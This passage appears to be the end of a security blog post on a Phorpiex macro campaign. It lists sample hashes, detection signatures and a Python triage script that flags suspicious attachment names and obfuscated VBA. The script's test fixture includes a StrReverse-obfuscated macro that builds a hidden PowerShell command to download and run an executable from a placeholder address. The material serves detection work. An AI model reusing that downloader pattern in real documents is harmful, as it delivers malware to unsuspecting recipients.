63. c4798dc2655e8263259f24c237a665f5f1cf556a082a321a64c8e91f2246e427
64. c9d69de2fc0f3ea9d57793e723b3e6234e034a6c533f5550c01376508861de87
65. ca409d1c8034b850cbee61ddb884267b3cb31f44e4adbd59da20498634726cc9
66. ca60b1755608f07a053cb1fdc87ccf506759a54867a6cb2f62f0568e043f9a44
67. cac05cef3b1607be9145894a619a27611e90a5edab4a6af4896f549cb1be0147
68. cdd6a50db75672ea4c5c3baec9c5ee4de14ad4fab4ef9a5ad7fa7d6fa97f8bff
69. da018eea106dc3a2a219049f9d0f5e55b87e5e3a91ca19877255fa65a06696d9
70. dc4ef4adefb5d26683d18fe788b432b13844fe1f54455576cee46d417bd5c666
71. e2293df854d6a0d86c965ad118e126f407f864cb54d830d4aa345c4d9557bc23
72. e9c64f7c4432ab680ad026e76ba299181c36e72596f227f924932ba744af82ad
73. eadc01694adc0f1137b4ec16299bb9c6c65180d7e446b71a885e082fff9b884f
74. ebf8f2d4463cd107039661c5ca349a00a2dc90ea537dac75b87b42b323cd48f5
75. f6985e91760b621462ed291eb35638b580ed9ede5e83834b9c026302d6fd5d9b

Detection

InQuest customers can hunt for signs of this campaign generically via the following signatures:

  • 5000532, MC_Embedded_VB_Macro, with confidence 9 and severity 9.
  • 3000080, SC_Suspicious_Macro_Function, with confidence 8 and severity 5.
  • 3000143, SC_StrRev_Macro, with confidence 8 and severity 4.
  • 5000869, MC_Phorpiex, with confidence 8 and severity 8.
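For readers without those signatures, the same traits the post calls out (the DOC[0-9]{10}.zip attachment name, a Shell() call with vbHide, and a macro that is mostly StrReverse()/Replace() calls) can be turned into a quick triage heuristic. The following is an added example (ours, not InQuest's signature logic, and the thresholds are assumptions chosen for illustration): it reproduces the grep | cut | distribution tally from the macro section in Python and scores a constructed suspicious macro against a constructed benign one.

```python
import re
from collections import Counter

# Campaign attachment naming convention from the post: DOC, ten digits, .zip
ATTACHMENT_RE = re.compile(r'^DOC\d{10}\.zip$', re.I)
# VBA string built-ins that dominated the call histogram
STRING_FUNCS = {'replace', 'strreverse', 'space', 'ucase', 'lcase', 'mid', 'left',
                'ltrim', 'right', 'rtrim', 'strconv', 'split', 'ubound', 'chr'}
CALL_RE = re.compile(r'\b([A-Za-z_]\w*)\s*\(')
# Shell(<anything>), 0   or   Shell(<anything>), vbHide
SHELL_HIDDEN_RE = re.compile(r'\bShell\s*\(.*\)\s*,\s*(?:0|vbHide)\b', re.I)

# Constructed samples (not harvested macros): hypothetical variable, TEST-NET-3 address.
SUSPICIOUS_MACRO = r'''
Sub AutoOpen()
    Dim fCOY As String
    fCOY = StrReverse("exe.llehsrewop") & Space(1) & Replace("-XXw 1", "XX", "")
    fCOY = fCOY & StrReverse(StrReverse(" (New-Object System.Net.WebClient)."))
    fCOY = fCOY & Replace("DownloadFileZZ", "ZZ", "") & UCase("(") & Mid("xx'hxxp://203.0.113.10/da.exe'", 3)
    fCOY = fCOY & Left(",([System.IO.Path]::GetTempPath()+'\bKKc.exe'));", 48)
    Shell (StrReverse(StrReverse(fCOY))), 0
End Sub
'''
BENIGN_MACRO = '''
Sub AutoOpen()
    MsgBox "Quarterly report loaded: " & UCase(Left(ActiveDocument.Name, 8))
End Sub
'''

def tally_calls(macro):
    """Count calls to the string built-ins, like the grep | cut | distribution pipeline."""
    names = (m.group(1).lower() for m in CALL_RE.finditer(macro))
    return Counter(n for n in names if n in STRING_FUNCS)

def score(filename, macro, min_obf_calls=5, min_ratio=0.5):
    """Return the tally, the triggered indicators and a verdict (thresholds are assumptions)."""
    tally = tally_calls(macro)
    lines = [l for l in macro.splitlines() if l.strip()]
    obf_calls = tally['strreverse'] + tally['replace']
    indicators = []
    if ATTACHMENT_RE.match(filename):
        indicators.append('attachment name matches DOC[0-9]{10}.zip')
    if SHELL_HIDDEN_RE.search(macro):
        indicators.append('Shell() launched with a hidden window (vbHide)')
    if obf_calls >= min_obf_calls and obf_calls / max(len(lines), 1) >= min_ratio:
        indicators.append(f'{obf_calls} StrReverse/Replace calls across {len(lines)} lines')
    verdict = 'malicious' if len(indicators) >= 2 else 'suspicious' if indicators else 'clean'
    return {'tally': tally, 'indicators': indicators, 'verdict': verdict}

def histogram(tally, width=40):
    """Render a tally the way the distribution utility does, for a quick eyeball check."""
    total = sum(tally.values()) or 1
    rows = []
    for name, count in tally.most_common():
        bar = '-' * max(1, int(width * count / total))
        rows.append(f'{name:>12}|{count:4d} ({100.0 * count / total:5.2f}%) {bar}')
    return rows

if __name__ == '__main__':
    for fname, macro in (('DOC1385624908.zip', SUSPICIOUS_MACRO), ('Q3-report.docm', BENIGN_MACRO)):
        result = score(fname, macro)
        print(fname, '->', result['verdict'], result['indicators'])
        print('\n'.join(histogram(result['tally'])))
```

The call tally is a rough instrument (it also counts names inside string literals, and a legitimate macro can lean on Replace()), which is why the verdict needs two independent indicators before it escalates; the attachment name alone only marks a message as suspicious.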

Further Reading

Listed here in reverse chronological order:
